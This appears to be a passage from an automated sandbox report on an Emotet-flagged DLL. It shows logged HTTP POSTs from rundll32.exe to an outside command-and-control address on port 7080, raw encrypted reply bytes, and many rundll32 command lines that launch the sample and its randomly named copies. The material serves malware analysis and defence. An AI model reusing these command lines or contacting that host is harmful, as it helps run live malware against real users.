                                            Jan 26, 2021 12:21:29.009375095 CET53605798.8.8.8192.168.2.4
                                            Jan 26, 2021 12:21:41.713407993 CET5018353192.168.2.48.8.8.8
                                            Jan 26, 2021 12:21:41.771472931 CET53501838.8.8.8192.168.2.4
                                            Jan 26, 2021 12:22:15.501127005 CET6153153192.168.2.48.8.8.8
                                            Jan 26, 2021 12:22:15.551822901 CET53615318.8.8.8192.168.2.4
                                            Jan 26, 2021 12:22:17.933409929 CET4922853192.168.2.48.8.8.8
                                            Jan 26, 2021 12:22:17.992547035 CET53492288.8.8.8192.168.2.4

                                            HTTP Request Dependency Graph

                                            • 203.157.152.9
                                              • 203.157.152.9:7080

                                            HTTP Packets

                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            0192.168.2.449750203.157.152.97080C:\Windows\SysWOW64\rundll32.exe
                                            TimestampkBytes transferredDirectionData
                                            Jan 26, 2021 12:21:23.705459118 CET513OUTPOST /2ijyf1/txor3som/z3prsr3ev/l8z0/1k9au09l0vb/ HTTP/1.1
                                            DNT: 0
                                            Referer: 203.157.152.9/2ijyf1/txor3som/z3prsr3ev/l8z0/1k9au09l0vb/
                                            Content-Type: multipart/form-data; boundary=---------FFexYarq3
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                            Host: 203.157.152.9:7080
                                            Content-Length: 6212
                                            Connection: Keep-Alive
                                            Cache-Control: no-cache
                                            Jan 26, 2021 12:21:24.364944935 CET627INHTTP/1.1 200 OK
                                            Server: nginx
                                            Date: Tue, 26 Jan 2021 11:21:24 GMT
                                            Content-Type: test/html; charset=UTF-8
                                            Content-Length: 413844
                                            Connection: keep-alive
                                            vary: Accept-Encoding
                                            Data Raw: d6 7e fa 9f 91 9a 89 90 26 0e 47 31 69 d9 7b 25 ec e9 03 d8 91 e7 27 29 68 c7 6a 1e be 19 35 5a 33 dd 13 7e a6 6b aa b2 92 d1 a4 81 69 70 c3 44 1c 11 1f 47 73 a1 98 73 84 ea 45 4c d3 32 92 8a 4d 78 2a 6a 20 10 9c eb 04 eb d0 65 45 a0 21 80 66 87 7c 02 f9 1a 8f 66 38 91 6c 08 5f 81 c6 bf 46 4d 11 49 d4 6b d7 b1 e6 24 6f 6d e9 1e 74 5f 88 62 05 11 36 f2 e6 1d 55 95 b5 a2 b0 83 2c 7e ba 58 4c 4c 14 fb f1 b3 74 9c 48 a8 dd 8d 4a 2d 57 f9 d9 7e 1e b2 d0 9c 22 ff bc 69 5a 60 15 30 ab 9d da 53 0f 65 d2 8f 22 e8 88 4d 83 0c 6b c6 b4 35 7a 25 73 ac 6b 5d 48 17 f8 cb 48 b8 32 cd e0 c5 6b 08 91 3e d0 cf f9 c5 82 6b 08 a0 53 20 37 b9 6a 54 74 05 8b b6 60 d3 2d 2d 61 79 5d d4 36 79 c9 b5 de 10 d9 3b d1 fa 32 e0 35 6f 0f 1e aa c2 1c e4 64 e1 3f 2c ef 6e ea d0 80 1d 57 98 91 d6 e4 29 23 1f 8a 69 9a b5 a3 01 e7 a6 90 0b f7 7a f7 d5 b6 c3 f0 2e 2c e7 e5 1f 76 6c cc 9b 72 e1 b3 27 3c e2 e3 ce f9 66 7f ac b1 35 8b b9 32 99 4e f3 22 88 2f 28 c7 27 c7 8c fd 2b 00 0a 4b 22 76 b2 50 1a 6f 64 37 e1 8f bb 24 51 f7 18 a6 7d ce 7e 84 c0 e2 99 59 06 d7 af 63 73 e5 73 32 27 6d d9 a1 dc c1 dd 47 42 53 45 d1 a1 83 54 16 88 c3 98 fc d2 e3 94 a5 14 f3 52 bc 02 6a 90 bf 29 56 2a 19 01 95 40 e9 6a 1c 64 b3 7c de 47 34 43 ae a4 21 91 df d7 3d dd 24 5a 0c 42 d9 de 42 1c 9d b8 8b 35 45 95 7c 1c cf 4e b7 35 61 e9 86 43 61 87 d2 8b 27 ea 53 0e 7e 87 b9 2c 3d 6c 8a c9 b2 3f 52 37 86 65 09 ba 68 99 fa d5 70 a0 21 3b 43 0a 76 17 2b 74 3d 3a 14 34 02 9e 11 6f 20 18 a8 a7 72 af cd 24 ed 11 66 05 b2 c3 05 47 ac 12 08 b6 8b 8e c9 51 c4 bf c6 79 01 53 70 e9 54 6b 7e 93 37 1d 2e 6b 61 d5 39 bf 54 9c fd 4e 1b bd f2 37 69 14 ed 75 bd 39 85 46 b2 ab 48 d4 2c f3 e8 7d ee 3e fd 69 f3 87 4a 34 43 a8 b2 24 a6 ad 9d 56 7e a6 f8 1c 78 28 93 e7 80 fb 4c e0 c6 bb 21 35 9c 26 05 1c 9d 04 2e 2e 6f 8b b7 05 22 99 8b 8a bb e5 49 1a 9e 8e ce f0 bb 38 8b 29 51 26 c5 a4 30 d2 bf 6c 56 51 2e 42 f6 30 5a a7 0e 68 92 6e 26 9c 22 db 2d b1 8f 6c 48 11 9d 65 7f a0 56 33 76 27 81 0b 9c 93 41 a8 a2 08 37 15 e4 c8 e0 d5 42 f0 31 76 79 e0 43 03 eb d5 ca 42 ac 44 f4 0e f5 2c 77 21 16 6d ce 8d fe 5e 95 a3 3c 47 bc b7 84 d7 b5 0b 09 1d 39 c7 52 50 c2 f6 cb 61 b1 2d 8c 57 a0 f0 46 43 2b f8 2b 61 37 e2 a7 b4 52 6d e1 05 b0 7d d1 ac ff 5d 20 e4 55 d6 98 39 3c 11 ed 7c 52 e7 5a c5 75 da 23 34 34 7f dd 48 19 ca f4 f6 b4 fa 64 fe a7 fb 0c 61 0b 62 28 43 e6 c4 e0 94 4e e8 fc c0 a1 0d b9 2e f1 29 82 fd 51 61 43 49 1b 99 e3 48 2a c5 60 b9 58 a4 2f 0b 30 4e 82 78 62 1c 76 e7 f5 7c 22 05 4c 53 62 18 35 29 80 e2 14 13 fe d6 01 27 69 a4 a1 02 b0 83 01 24 b8 d7 95 39 65 30 d7 5b 18 f9 70 59 cf 25 41 ca 06 6e c8 af 44 1c 3e 48 62 3b 2a 52 fb c4 57 34 d6 19 be c6 c4 6a 62 cd 53 93 90 18 c2 cd 02 5a fb 07 54 24 47 02 27 fa b9 ef 10 a7 0b 5a a6 b1 51 12 89 0e 96 96 69 fc a5 a5 59 56 67 24 bc e0 57 60 4a 83 5d 94 8c 1e 05 78 10 ea 11 cc df 02 19 71 9a d0 13 96 41 e4 3f f4 f6 05 3b cd 48 f5 fc 55 29 70 00 27 e4 8b 61 a0 b7 3f b5 f7 d2 3c 18 e2 a6 bf 21 be c5 b1 1c 6e 02 7b 9f 0d 0f b2 80 96 04 92 d1 5a b4 49 fa fa 6a 9b fc 92 c0 88 19 1b c1 e4 56 e9 45 ec a3 42 22 58 31 c0 f9 2b 1a d9 50 ff 47 14 4e 69 bc b1 b8 61 c7 12 a6 a4 11 be 9d 7e 79 4e 30 b3 a3 43 cd c5 97 07 78 9c 5d 71 1c 25 eb b3 09 38 1a 0a c8 0d 9d 2e 03 ef 23 e2 96 96 03 9d b3 55 b0 b1 8d 27 ff 94 a0 0f 5b cc 0f 93 9d 84 7c a4 a5 e6 d5 9e 97 bd 67 4e 1e ae 3e d6 d9 7e 0b f0 b2 ab b9 ee ab ea 15 08 50 e4 8f 99 5c 6a c1 e5 b8 46 dd 43 47 91 76 24 55 77 65 1b 3a 74 a2 55 aa 38 8a 73 44 07 9e d0 50 c9 ea fd ba 3d 56 a7 87 72 2b 24 5d 7b 80 2b
                                            Data Ascii: ~&G1i{%')hj5Z3~kipDGssEL2Mx*j eE!f|f8l_FMIk$omt_b6U,~XLLtHJ-W~"iZ`0Se"Mk5z%sk]HH2k>kS 7jTt`--ay]6y;25od?,nW)#iz.,vlr'<f52N"/('+K"vPod7$Q}~Ycss2'mGBSETRj)V*@jd|G4C!=$ZBB5E|N5aCa'S~,=l?R7ehp!;Cv+t=:4o r$fGQySpTk~7.ka9TN7iu9FH,}>iJ4C$V~x(L!5&..o"I8)Q&0lVQ.B0Zhn&"-lHeV3v'A7B1vyCBD,w!m^<G9RPa-WFC++a7Rm}] U9<|RZu#44Hdab(CN.)QaCIH*`X/0Nxbv|"LSb5)'i$9e0[pY%AnD>Hb;*RW4jbSZT$G'ZQiYVg$W`J]xqA?;HU)p'a?<!n{ZIjVEB"X1+PGNia~yN0Cx]q%8.#U'[|gN>~P\jFCGv$Uwe:tU8sDP=Vr+$]{+
                                            Jan 26, 2021 12:21:26.096020937 CET1272OUTPOST /k8idqdr2/ HTTP/1.1
                                            DNT: 0
                                            Referer: 203.157.152.9/k8idqdr2/
                                            Content-Type: multipart/form-data; boundary=-----------QeejNQ4AFBy
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                            Host: 203.157.152.9:7080
                                            Content-Length: 5732
                                            Connection: Keep-Alive
                                            Cache-Control: no-cache
                                            Jan 26, 2021 12:21:26.792149067 CET1331INHTTP/1.1 200 OK
                                            Server: nginx
                                            Date: Tue, 26 Jan 2021 11:21:26 GMT
                                            Content-Type: test/html; charset=UTF-8
                                            Content-Length: 132
                                            Connection: keep-alive
                                            vary: Accept-Encoding
                                            Data Raw: ed 7e e3 3f 60 b7 f8 19 43 1d 57 dc 6a 31 98 8b 2c 4c 61 b9 7d ac 40 6f 48 53 38 9e d1 d7 ea b6 f2 4a 37 6a 15 ce 8e ad b1 56 0d 5d 15 33 71 63 77 5f 7e 06 04 46 f1 8f 3d 00 d6 1b 9a 2b 0b cb ef e1 ee 6d 88 bf db 0e 78 60 8f b9 5d 0b fb c2 86 e9 6c 8d 63 bd cd 8e 52 ab 55 0e 8d 35 db 7d 05 fe 40 57 53 16 6f 12 55 59 e7 c9 ac 55 86 54 f1 07 c7 e9 a6 16 5c 43 fa c7 ea 37 7e 42 16 9f 63 40 f7 b9
                                            Data Ascii: ~?`CWj1,La}@oHS8J7jV]3qcw_~F=+mx`]lcRU5}@WSoUYUT\C7~Bc@


                                            Code Manipulations

                                            Statistics

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            General

                                            Start time:12:20:38
                                            Start date:26/01/2021
                                            Path:C:\Windows\System32\loaddll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:loaddll32.exe 'C:\Users\user\Desktop\zGeK5so94c.dll'
                                            Imagebase:0xff0000
                                            File size:120832 bytes
                                            MD5 hash:2D39D4DFDE8F7151723794029AB8A034
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate

                                            General

                                            Start time:12:20:39
                                            Start date:26/01/2021
                                            Path:C:\Windows\System32\svchost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                            Imagebase:0x7ff6eb840000
                                            File size:51288 bytes
                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            General

                                            Start time:12:20:39
                                            Start date:26/01/2021
                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 7100 -ip 7100
                                            Imagebase:0xb30000
                                            File size:434592 bytes
                                            MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            General

                                            Start time:12:20:40
                                            Start date:26/01/2021
                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7100 -s 240
                                            Imagebase:0xb30000
                                            File size:434592 bytes
                                            MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            General

                                            Start time:12:20:45
                                            Start date:26/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:rundll32.exe C:\Users\user\Desktop\zGeK5so94c.dll,Control_RunDLL
                                            Imagebase:0xf50000
                                            File size:61952 bytes
                                            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000004.00000002.678150026.00000000729E1000.00000020.00020000.sdmp, Author: Joe Security
                                            Reputation:high

                                            General

                                            Start time:12:20:45
                                            Start date:26/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Desktop\zGeK5so94c.dll',#1
                                            Imagebase:0xf50000
                                            File size:61952 bytes
                                            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000005.00000002.679972484.00000000729E1000.00000020.00020000.sdmp, Author: Joe Security
                                            Reputation:high

                                            General

                                            Start time:12:20:46
                                            Start date:26/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hbjpd\usib.lxs',dldZeiafGYsN
                                            Imagebase:0xf50000
                                            File size:61952 bytes
                                            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000006.00000002.680588418.00000000729E1000.00000020.00020000.sdmp, Author: Joe Security
                                            Reputation:high

                                            General

                                            Start time:12:20:46
                                            Start date:26/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\Hbjpd\usib.lxs',#1
                                            Imagebase:0xf50000
                                            File size:61952 bytes
                                            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.773552883.00000000729E1000.00000020.00020000.sdmp, Author: Joe Security
                                            Reputation:high

                                            General

                                            Start time:12:21:01
                                            Start date:26/01/2021
                                            Path:C:\Windows\System32\svchost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                            Imagebase:0x7ff6eb840000
                                            File size:51288 bytes
                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            General

                                            Start time:12:21:10
                                            Start date:26/01/2021
                                            Path:C:\Windows\System32\svchost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                            Imagebase:0x7ff6eb840000
                                            File size:51288 bytes
                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            General

                                            Start time:12:21:20
                                            Start date:26/01/2021
                                            Path:C:\Windows\System32\svchost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                            Imagebase:0x7ff6eb840000
                                            File size:51288 bytes
                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            General

                                            Start time:12:21:25
                                            Start date:26/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\Hbjpd\pixmxoo.dll',#1 NAQAAB4AAABIAGIAagBwAGQAXAB1AHMAaQBiAC4AbAB4AHMAAAA=
                                            Imagebase:0xf50000
                                            File size:61952 bytes
                                            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            General

                                            Start time:12:21:31
                                            Start date:26/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hbjpd\usib.lxs',Control_RunDLL
                                            Imagebase:0xf50000
                                            File size:61952 bytes
                                            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            General

                                            Start time:12:21:34
                                            Start date:26/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hlqxmsfzi\jjvjowsk.xoz',Control_RunDLL
                                            Imagebase:0xf50000
                                            File size:61952 bytes
                                            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            General

                                            Start time:12:21:40
                                            Start date:26/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bdtgy\atyx.hvl',Control_RunDLL
                                            Imagebase:0xf50000
                                            File size:61952 bytes
                                            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            General

                                            Start time:12:21:42
                                            Start date:26/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Cfwgvspim\fwvopxwu.wpy',Control_RunDLL
                                            Imagebase:0xf50000
                                            File size:61952 bytes
                                            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language

                                            General

                                            Start time:12:21:44
                                            Start date:26/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ibbigqfuoubc\tiynxefumvm.jsi',Control_RunDLL
                                            Imagebase:0xf50000
                                            File size:61952 bytes
                                            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language

                                            General

                                            Start time:12:21:46
                                            Start date:26/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Aziiwkqaqp\dnweyyfur.lyr',Control_RunDLL
                                            Imagebase:0xf50000
                                            File size:61952 bytes
                                            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language

                                            General

                                            Start time:12:21:47
                                            Start date:26/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Uchtpmhcpt\nfuoltapn.fge',Control_RunDLL
                                            Imagebase:0xf50000
                                            File size:61952 bytes
                                            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language

                                            General

                                            Start time:12:21:50
                                            Start date:26/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zvrxg\husq.avr',Control_RunDLL
                                            Imagebase:0xf50000
                                            File size:61952 bytes
                                            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language

                                            General

                                            Start time:12:21:53
                                            Start date:26/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jcoinynbga\etdgpznst.qoo',Control_RunDLL
                                            Imagebase:0xf50000
                                            File size:61952 bytes
                                            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language

                                            General

                                            Start time:12:22:00
                                            Start date:26/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bfurjavtsbwkajdv\sfvtpwqlhvedlny.xdk',Control_RunDLL
                                            Imagebase:0xf50000
                                            File size:61952 bytes
                                            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language

                                            General

                                            Start time:12:22:02
                                            Start date:26/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Msjhyngbojq\bihctgwrjw.jsh',Control_RunDLL
                                            Imagebase:0xf50000
                                            File size:61952 bytes
                                            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language

                                            General

                                            Start time:12:22:05
                                            Start date:26/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mntpro\pwmgi.sow',Control_RunDLL
                                            Imagebase:0xf50000
                                            File size:61952 bytes
                                            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language

                                            General

                                            Start time:12:22:06
                                            Start date:26/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Sioetxuvrihjyxu\wsarziebmecgqp.weo',Control_RunDLL
                                            Imagebase:0xf50000
                                            File size:61952 bytes
                                            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language

                                            General

                                            Start time:12:22:09
                                            Start date:26/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jvotvplywpzb\qwoawgsuzao.fmz',Control_RunDLL
                                            Imagebase:0xf50000
                                            File size:61952 bytes
                                            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language

                                            General

                                            Start time:12:22:12
                                            Start date:26/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ofqhxlaxbkixqlny\iogmsr.ktr',Control_RunDLL
                                            Imagebase:0xf50000
                                            File size:61952 bytes
                                            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language

                                            General

                                            Start time:12:22:18
                                            Start date:26/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Usfyyrevasc\hoztidaylv.ruq',Control_RunDLL
                                            Imagebase:0xf50000
                                            File size:61952 bytes
                                            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language

                                            General

                                            Start time:12:22:24
                                            Start date:26/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wzvizgyhx\mlhiyaxu.lik',Control_RunDLL
                                            Imagebase:0xf50000
                                            File size:61952 bytes
                                            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language

                                            General

                                            Start time:12:22:26
                                            Start date:26/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Tthpthgifqmjjt\idvrfaaidqwxo.flr',Control_RunDLL
                                            Imagebase:0xf50000
                                            File size:61952 bytes
                                            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language

                                            General

                                            Start time:12:22:28
                                            Start date:26/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jdedkdp\loyrno.rpx',Control_RunDLL
                                            Imagebase:0x7ff732050000
                                            File size:61952 bytes
                                            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language

                                            General

                                            Start time:12:22:37
                                            Start date:26/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mwmln\clyk.jxd',Control_RunDLL
                                            Imagebase:0xf50000
                                            File size:61952 bytes
                                            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language

                                            Disassembly

                                            Code Analysis

                                            Reset < >